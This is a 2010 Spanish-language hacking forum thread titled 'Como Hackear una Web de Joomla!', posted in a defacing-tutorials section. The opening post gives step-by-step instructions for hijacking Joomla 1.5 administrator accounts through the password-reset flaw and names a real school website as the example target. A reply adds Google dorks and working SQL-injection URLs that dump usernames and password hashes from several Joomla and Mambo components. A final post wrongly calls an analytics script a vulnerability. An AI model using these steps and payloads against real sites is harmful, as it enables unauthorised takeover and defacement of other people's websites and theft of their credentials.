ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
13:35:32 17/10/2019
¿No estas registrado?
Login: Clave:
2 Usuarios en línea: 0 registrados, 2 invitados.
Conéctate y verás los usuarios en línea
Tema: Como Hackear una Web de Joomla! 2 votos2 votos2 votos2 votos2 votos
    Tema cerrado
Todos Los Foros -> Defacing -> Tutoriales -> Como Hackear una Web de Joomla!
Autor Mensaje (Ver Versión para Imprimir)
SesshoHacker
Usuario aficionado

Mensajes: 10
Registrad@:
15/02/2010
Estado: Desconectad@
Ver último Post
Como Hackear una Web de Joomla!

Bien, soy un hacker en entrenamiento y este es mi primer tema, empezemos por pasos:

1.-Primero encontrar una web creada en Joomla 1.5
Ejemplo: http://www.scuolaitalianadiconcepcion.cl/

2.-Despues a la url hay que agregarle esto: /index.php?option=com_user&view=reset&layout=confirm
Ejemplo: http://www.scuolaitalianadiconcepcion.cl/index.php?option=com_user&view=reset&layout=confirm

3.-En la parte que te pide una clave escribes '

4.-Luego pones una nueva contraseña y despues la verificas

5.-Despues a la url principal le agregas: /administrator/
Ejemplo: http://www.scuolaitalianadiconcepcion.cl/administrator/

6.-En el Usuario pones Admin y en la Contraseña la que pusiste anteriormente

Y listo tienes total control de la pagina!!!



PD: Por previos atackes hacker la pagina de ejemplo reforso su seguridad y no se puede hackear mas.
15/02/2010 01:32:04 
s3cure
Usuario Enfermo
Arreglando las imágenes

Mensajes: 69
Registrad@:
07/01/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

una linda fuente para kiddies :)


Creer que todo es genial para luego ver realidad.
15/02/2010 03:58:27 
HeR0
Maestro Nivel 3
Arreglando las imágenes

Mensajes: 642
Registrad@:
29/10/2008
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

jeje bueno, por lo que explicas es facil... pero aun pùede ser mas facil:

conoces alguna forma mas fácil de buscar sitios creados en joombla, como dork`s x ejemplo?

algun parche?

Salud2



15/02/2010 05:44:42 
kevinpunk
Casi Maestro Nivel 2
Arreglando las imágenes

Mensajes: 165
Registrad@:
25/08/2009
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

CITA
Bien, soy un hacker


Hola Señor Hacker ... Buen Post. Queria recordarte que un hacker no es solo el que hace estas cosas, las puede hacer cualquier siempre y cuando sepa algo de Programacion PHP y SQL lo q dices es bastante sencillo es mas se puede hacer en cualquier pagina si quieres

Yo Mismo dejare el Post con algunas Debilidades de HTML

Salu2


Kev!n PunK!!
15/02/2010 15:31:04 
SesshoHacker
Usuario aficionado

Mensajes: 10
Registrad@:
15/02/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

CITA
aun pùede ser mas facil:

conoces alguna forma mas fácil de buscar sitios creados en joombla, como dork`s x ejemplo?

algun parche?



Haora que lo pienso Hero debe haber algo mas facil o posible de programar
buscare algo :)

y Kevin... yo se que un hacker no es solo eso, yo tengo variados conocimientos pero yo todavia no me podria llamar hacker, por eso puse hacker en entrenamiento.

bn... grax :)
15/02/2010 17:39:17 
HeR0
Maestro Nivel 3
Arreglando las imágenes

Mensajes: 642
Registrad@:
29/10/2008
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

wenas de vuelta :P , wena encontre esto, que lo tenia : (cito el texto con el nombre del autor y todo), talves te interese tambien :)

CITA
************************************************** *****************************
# Title : Joomla Component EventList <= 0.8 (did) Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact :
# S.Page : http://www.schlu.net/
# $$ : Free
# Dork : intext:"Event List 0.8 Alpha by schlu.net "
# DorkEx : http://www.google.com.tr/search?q=in...r&start=0&sa=N
************************************************** *****************************
[[SQL>>>---------------------------------------------------------
http://[target>/[path>//index.php?option=com_eventlist&func=details&did=[SQL Inject>
Example:
//index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
[[/SQL>>
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!


GOOGLE Dork :
allinurl: "com_musepoes"
Exploit :
index.php?option=com_musepoes&task=answer&Itemid=s @bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*



Joomla Hata Google Dork :
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"


Exploit For Joomla :
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--


Exploit for Mambo:
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--


Joomla Cambiar la contraseña del administrador Exploit:
index.php?option=com_user&view=reset&layout=confirm


#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user...


este artículo esta bastante completo tambien trata sobre deface/"hackeo" de sitios creados con joomla tambien

Salu2



15/02/2010 18:39:03 
SesshoHacker
Usuario aficionado

Mensajes: 10
Registrad@:
15/02/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

HeRO gracias por el aporte, esta muy completo... haora lo voy a ir a probar probar :P


grax x Td
15/02/2010 19:03:24 
NT38K
Casi Maestro Nivel 3

Mensajes: 229
Registrad@:
17/01/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

Buena Discusion q se ah formado,.eso es lo q intereza q halla dinamica entre nosotros lo usuarios,., buenos tuto chicos
atte:NT38K
15/02/2010 20:08:15 
s3cure
Usuario Enfermo
Arreglando las imágenes

Mensajes: 69
Registrad@:
07/01/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

Si la dinamica genial, pero el tuto es muy kiddie, eso crea muy malos usuarios. Qué le paso al antiguo forohack?

Lo que me gustaría: Que se de una explicación de porque sucede, tipo de error, en que parte y archivo se encuentra el error (generalmente es linea blabla, u know). Sería genial poder desarrollarlo de esa mánera.

salu2.


Creer que todo es genial para luego ver realidad.
15/02/2010 23:13:48 
SesshoHacker
Usuario aficionado

Mensajes: 10
Registrad@:
15/02/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

CITA
Lo que me gustaría: Que se de una explicación de porque sucede, tipo de error, en que parte y archivo se encuentra el error (generalmente es linea blabla, u know). Sería genial poder desarrollarlo de esa mánera.


Tienes razon s3cure, es muy kiddie, pero debes tomar en cuenta que a este foro no solo vienen hacker de un gran nivel, por lo que dices se me ocurre que tu sabes mucho de esto... osea tu podrias encontrar otra forma de hackear la web y podrias compartirla como lo hizo HeRO.

Esos son mis puntos de vista de la situacion, y como dice NT38K esta bien debatar la situacion.

grax x los cometarioS
15/02/2010 23:22:45 
flck
Aprendiz nivel 1
Sin Imagen

Mensajes: 22
Registrad@:
18/12/2009
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

buen aporte....
hay un programa q ayuda a q esto sea mas facil...
SQL-helper...
















"la vida nos cambia en un minuto..."
16/02/2010 00:41:08 
s3cure
Usuario Enfermo
Arreglando las imágenes

Mensajes: 69
Registrad@:
07/01/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

No digo nada de conocimientos, si no del aporte.
Igual no hay problem, a los que le gusta que lo vean .xd

salutes.


Creer que todo es genial para luego ver realidad.
16/02/2010 04:20:11 
NeptunoCode
Usuario aficionado
Sin Imagen

Mensajes: 15
Registrad@:
11/11/2009
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

CITA
Si la dinamica genial, pero el tuto es muy kiddie, eso crea muy malos usuarios. Qué le paso al antiguo forohack?

Lo que me gustaría: Que se de una explicación de porque sucede, tipo de error, en que parte y archivo se encuentra el error (generalmente es linea blabla, u know). Sería genial poder desarrollarlo de esa mánera.


Alguien dice algo con sentido xD SessoHacker, lo que interesa es el conocimiento, no el saber explotar algo, del que ni si quiera segúramente entiendes por que existe esa vulnerabilidad.
16/02/2010 11:38:25 
SesshoHacker
Usuario aficionado

Mensajes: 10
Registrad@:
15/02/2010
Estado: Desconectad@
Ir Arriba
RE: Como Hackear una Web de Joomla!

En algo tienen razon, este no es de lo que mas se, pero vi una vulneravilidad
en la web es esta:

CÓDIGO
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
<script type="text/javascript">


no se si esa es la misma pero es lo unico que vi.

PD:No quiero que esto llege a una pelea o un debate mayor, gracias


16/02/2010 22:12:54 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)


NO SE PUEDEN ENVIAR RESPUESTAS A ESTE MENSAJE, ¡¡ESTÁ CERRADO!!. SI QUIERES ABRE OTRO TEMA




Copyright ForoHack.com